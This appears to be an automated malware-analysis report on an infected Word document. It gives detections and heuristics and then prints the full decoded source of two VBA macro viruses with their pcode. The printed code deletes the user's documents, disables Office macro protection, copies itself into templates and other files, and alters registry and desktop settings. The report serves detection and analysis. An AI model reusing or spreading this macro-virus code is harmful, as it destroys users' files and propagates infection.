MALICIOUS
266
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and VBA macros, indicating a malicious intent to execute code. The 'Document_Open' subroutine is present, which is commonly used to trigger malicious actions upon opening the document. The script attempts to disable virus protection and potentially download further malicious content, as suggested by the ClamAV detections.
Heuristics 8
-
ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-35
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.degriftour.com/ In document text (OLE body)
- http://www.aircanada.ca/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41074 bytes |
SHA-256: f0d004ddb2c37cf075234d3da7d7b0f3425afc194bdb2e0066fb1f87e892b28b |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-13
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Seline, Where are you dear
Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim Jon, Users, LogData, LogFile As String
On Error Resume Next
AddIns.Unload True
Kill Options.DefaultFilePath(8) & "\*.doc"
Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
Application.UserInitials = "MeMeX"
Application.UserAddress = "JonMMx2000@yahoo.com"
Application.EnableCancelKey = wdCancelDisabled
GoSub InsertIon
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
"LogData in") = False) Then GoSub LoggingIn
If WeekDay(Now()) = 1 Then GoSub ShowMe
GoTo Finish
InsertIon:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DI Then
NTS = NormalTemplate.Saved
Jon = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
For i = 1 To Len(Application.UserAddress)
If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
Users = Users & Mid(Application.UserAddress, i, 1)
End If
Else
Users = Users & Chr(13) & " '"
End If
Next
Jon = Jon & Chr(13) & _
"' " & Format(Time, "hh:mm:sc AMPM-") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & Users & Chr(13) & Chr(13) & " "
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString Jon
If NTS Then NormalTemplate.Save
End If
If NTI Then
DS = ActiveDocument.Saved
Jon = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString Jon
If DS Then ActiveDocument.Save
End If
End If
Return
LoggingIn:
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
GoSub ShowMe
Return
ShowMe:
Dim RootsyS As String
On Error Resume Next
RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
Open RootsyS & "\Jon.html" For Output As #1
Print #1, "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
Print #1, "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
Print #1, "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
Print #1, "<font normal></center>To the very best that happen in mylife<p>"
Print #1, "<p>Long ago and in my mind, I can see your face lonely and lost in time "
Print #1, "<p>You were gone since yester month But the memories, never would dissapear"
Print #1, "<p>I think of you, I THINK OF YOU.<p>"
Print #1, "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
Print #1, "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
Print #1, "<p>Dear Iin, I close my eyes and see your face. That's all I have to do to be with you. "
Print #1, "<p>Dear Iin, altough I can not touch your face. I know what I can do to be with you "
Print #1, "<p>Long ago so faraway. But the light of blue, still living with me today."
Print #1, "<p>You were gone since yester month. But the memories never would dissapear."
Print #1, "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General", "Wallpaper") = RootsyS & "\Jon.html"
Return
Finish:
End Sub
'Logfile -->
' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com
' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:55:459:55:45 AM AM-Wednesday, 25 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:05:474:05:47 AM AM-Thursday, 26 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:41:387:41:38 PM PM-Friday, 27 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:43:2212:43:22 PM PM-Monday, 30 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:02:559:02:55 -Sabtu, 28 Agust 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:16:1314:16:13 -Jumat, 3 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:17:374:17:37 AM AM-Saturday, 4 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:42:399:42:39 PM PM-Monday, 6 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:00:4210:00:42 PM PM-Wednesday, 8 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:19:334:19:33 PM PM-Thursday, 9 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:32:279:32:27 AM AM-Thursday, 16 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:23:111:23:11 PM PM-Wednesday, 6 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:56:212:56:02 PM PM-Friday, 8 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:37:611:37:06 AM AM-Saturday, 9 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:43:710:43:07 PM PM-Thursday, 14 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:30:25:30:02 PM PM-Wednesday, 10 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:17:510:17:05 AM AM-Tuesday, 16 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:17:146:17:14 PM PM-Monday, 15 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:32:467:32:46 PM PM-Thursday, 18 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:06:587:06:58 PM PM-Wednesday, 24 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:38:422:38:42 AM AM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:59:48:59:04 PM PM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:18:221:18:22 -Jumat, 26 Nop 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:51:287:51:28 PM PM-Monday, 29 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:58:510:58:05 -jeudi, 2 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:11:114:11:01 -lundi, 6 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:58:1918:58:19 -mardi, 7 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:43:2714:43:27 -lundi, 13 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:04:5511:04:55 -vendredi, 17 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:10:4114:10:41 -jeudi, 13 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:17:3010:17:30 -vendredi, 14 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:08:5509:08:55 -mardi, 18 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:42:4114:42:41 -vendredi, 21 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:52:2714:52:27 -vendredi, 21 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:41:618:41:06 -mardi, 25 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:46:4515:46:45 -mercredi, 2 févr 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
Attribute VB_Name = "akrnl"
Public Skip As Integer
Sub Akrnl()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If Day(Now()) > 22 Then Call RandomRemplace
End Sub
Sub AutoExec()
On Error Resume Next
Call Sauve
End Sub
Sub AutoNew()
On Error Resume Next
Call Sauve
End Sub
Sub AutoPrint()
On Error Resume Next
Call Sauve
End Sub
Sub FileNew()
On Error Resume Next
Call Sauve
dialogs(wdDialogFileNew).show
Skip = 1
Call Sauve
End Sub
Sub FileClose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
Call Sauve
End Sub
Sub FileExit()
On Error Resume Next
Call Sauve
Application.Quit
End Sub
Sub AutoOpen()
On Error Resume Next
Call Akrnl
Call Sauve
End Sub
Sub AutoExit()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub AutoClose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Call Sauve
End Sub
Sub ToolsMacro()
On Error Resume Next
End Sub
Sub FileTemplates()
On Error Resume Next
End Sub
Sub ViewVBCode()
On Error Resume Next
End Sub
Sub RandomRemplace()
randomize
ValRandom = Int(Rnd * 75)
If ValRandom < 20 Then BesoinRemplace = True
If ValRandom < 20 Then txt = "ainsi, si j'en crois ce que mon incompétant de professeur me dit,"
If ValRandom < 15 Then txt = "ainsi, mon chat a perdu ses dents. De plus,"
If ValRandom < 10 Then txt = "ainsi, selon ma grand-mère,"
If ValRandom < 5 Then txt = "ainsi, la matière du cours est plate. De plus,"
If BesoinRemplace = True Then Call Remplace(txt)
End Sub
Sub Remplace(txt)
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "donc,"
.Replacement.Text = txt
.Forward = True
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceOne
Selection.MoveUp Unit:=wdScreen, Count:=8
End Sub
Sub Sauve()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("akrnl").Export "c:\Étudiant.cfg"
ActiveDocument.ReadOnlyRecommended = False
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
NomMacro = ActiveDocument.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentAct = True Else Call DelVir(NomMacro)
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NomMacro = NormalTemplate.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentNorm = True Else Call DelVir(NomMacro)
Next i
If PrésentAct = True And PrésentNorm = False Then Set BesoinSauve = NormalTemplate.VBProject.VBComponents
If PrésentAct = False And PrésentNorm = True Then Set BesoinSauve = ActiveDocument.VBProject.VBComponents
BesoinSauve.Import "c:\Étudiant.cfg"
If PrésentNorm = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
If PrésentAct = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub DelVir(NomMacro)
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Remove _
Application.VBE.ActiveVBProject.VBComponents(NomMacro)
With Application.NormalTemplate.VBProject
.VBComponents.Remove .VBComponents(NomMacro)
End With
End Sub
' Processing file: /tmp/qstore_2h5d5ahl
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 16942 bytes
' Line #0:
' QuoteRem 0x0000 0x001A "Seline, Where are you dear"
' Line #1:
' Dim (Const)
' LitStr 0x0033 "<- this is a marker! by jonhehehe TheBest-versi212x"
' VarDefn Marker
' Line #2:
' FuncDefn (Private Sub Document_Open())
' Line #3:
' ArgsCall Document_Close 0x0000
' Line #4:
' EndSub
' Line #5:
' FuncDefn (Private Sub Document_Close())
' Line #6:
' Dim
' VarDefn nmod (As Object)
' Line #7:
' Dim
' VarDefn isd (As String)
' Line #8:
' Dim
' VarDefn DS
' VarDefn NTS
' VarDefn DI
' VarDefn NTI (As Boolean)
' Line #9:
' Dim
' VarDefn Jon
' VarDefn Users
' VarDefn LogData
' VarDefn LogFile (As String)
' Line #10:
' OnError (Resume Next)
' Line #11:
' LitVarSpecial (True)
' Ld AddIns
' ArgsMemCall Unlock 0x0001
' Line #12:
' LitDI2 0x0008
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' LitStr 0x0006 "\*.doc"
' Concat
' ArgsCall Kill 0x0001
' Line #13:
' LitDI2 0x0008
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' LitStr 0x0006 "\*.dot"
' Concat
' ArgsCall Kill 0x0001
' Line #14:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #15:
' LitStr 0x000B "JonMMx 2000"
' Ld Application
' MemSt UserName
' Line #16:
' LitStr 0x0005 "MeMeX"
' Ld Application
' MemSt UserInitials
' Line #17:
' LitStr 0x0014 "JonMMx2000@yahoo.com"
' Ld Application
' MemSt UserAddress
' Line #18:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #19:
' GoSub InsertIon
' Line #20:
' LineCont 0x0004 0A 00 03 00
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x000A "LogData in"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' If
' BoSImplicit
' GoSub LoggingIn
' EndIf
' Line #21:
' ArgsLd Now 0x0000
' ArgsLd WeekDay 0x0001
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' GoSub ShowMe
' EndIf
' Line #22:
' GoTo Finish
' Line #23:
' Label InsertIon
' Line #24:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set ad
' Line #25:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set nt
' Line #26:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld ad
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DI
' Line #27:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld nt
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St NTI
' Line #28:
' Ld DI
' Ld NTI
' Xor
' Paren
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' Paren
' And
' IfBlock
' Line #29:
' Ld DI
' IfBlock
' Line #30:
' Ld NormalTemplate
' MemLd Saved
' St NTS
' Line #31:
' LitDI2 0x0001
' Ld ad
' MemLd CodeModule
' MemLd CountOfLines
' Ld ad
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St Jon
' Line #32:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Application
' MemLd UserAddress
' FnLen
' For
' Line #33:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Ne
' Paren
' IfBlock
' Line #34:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Ne
' Paren
' IfBlock
' Line #35:
' Ld Users
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Concat
' St Users
' Line #36:
' EndIfBlock
' Line #37:
' ElseBlock
' Line #38:
' Ld Users
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 " '"
' Concat
' St Users
' Line #39:
' EndIfBlock
' Line #40:
' StartForVariable
' Next
' Line #41:
' LineCont 0x0010 09 00 09 00 12 00 10 00 1E 00 09 00 29 00 09 00
' Ld Jon
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld Time
' LitStr 0x000E "hh:mm:sc AMPM-"
' ArgsLd Format$ 0x0002
' Concat
' Ld Date
' LitStr 0x0010 "dddd, d mmm yyyy"
' ArgsLd Format$ 0x0002
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld Application
' MemLd UserName
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld Users
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 " "
' Concat
' St Jon
' Line #42:
' LitDI2 0x0001
' Ld nt
' MemLd CodeModule
' MemLd CountOfLines
' Ld nt
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #43:
' Ld Jon
' Ld nt
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #44:
' Ld NTS
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #45:
' EndIfBlock
' Line #46:
' Ld NTI
' IfBlock
' Line #47:
' Ld ActiveDocument
' MemLd Saved
' St DS
' Line #48:
' LitDI2 0x0001
' Ld nt
' MemLd CodeModule
' MemLd CountOfLines
' Ld nt
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St Jon
' Line #49:
' LitDI2 0x0001
' Ld ad
' MemLd CodeModule
' MemLd CountOfLines
' Ld ad
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #50:
' Ld Jon
' Ld ad
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #51:
' Ld DS
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #52:
' EndIfBlock
' Line #53:
' EndIfBlock
' Line #54:
' Return
' Line #55:
' Label LoggingIn
' Line #56:
' LitVarSpecial (True)
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x000A "LogData in"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #57:
' GoSub ShowMe
' Line #58:
' Return
' Line #59:
' Label ShowMe
' Line #60:
' Dim
' VarDefn RootsyS (As String)
' Line #61:
' OnError (Resume Next)
' Line #62:
' LitStr 0x0000 ""
' LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' LitStr 0x000A "SystemRoot"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St RootsyS
' Line #63:
' Ld RootsyS
' LitStr 0x0009 "\Jon.html"
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #64:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x007A "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
' PrintItemNL
' Line #65:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x006C "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
' PrintItemNL
' Line #66:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0080 "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
' PrintItemNL
' Line #67:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x003F "<font normal></center>To the very best that happen in mylife<p>"
' PrintItemNL
' Line #68:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0048 "<p>Long ago and in my mind, I can see your face lonely and lost in time "
' PrintItemNL
' Line #69:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004B "<p>You were gone since yester month But the memories, never would dissapear"
' PrintItemNL
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0025 "<p>I think of you, I THINK OF YOU.<p>"
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0051 "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004A "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0059 "<p>Dear Iin, I close my eyes and see your face. That's all I have to do to be with you. "
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0055 "<p>Dear Iin, altough I can not touch your face. I know what I can do to be with you "
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004A "<p>Long ago so faraway. But the light of blue, still living with me today."
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004D "<p>You were gone since yester month. But the memories never would dissapear."
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0063 "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
' PrintItemNL
' Line #78:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #79:
' Ld RootsyS
' LitStr 0x0009 "\Jon.html"
' Concat
' LitStr 0x0000 ""
' LitStr 0x0046 "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General"
' LitStr 0x0009 "Wallpaper"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #80:
' Return
' Line #81:
' Label Finish
' Line #82:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.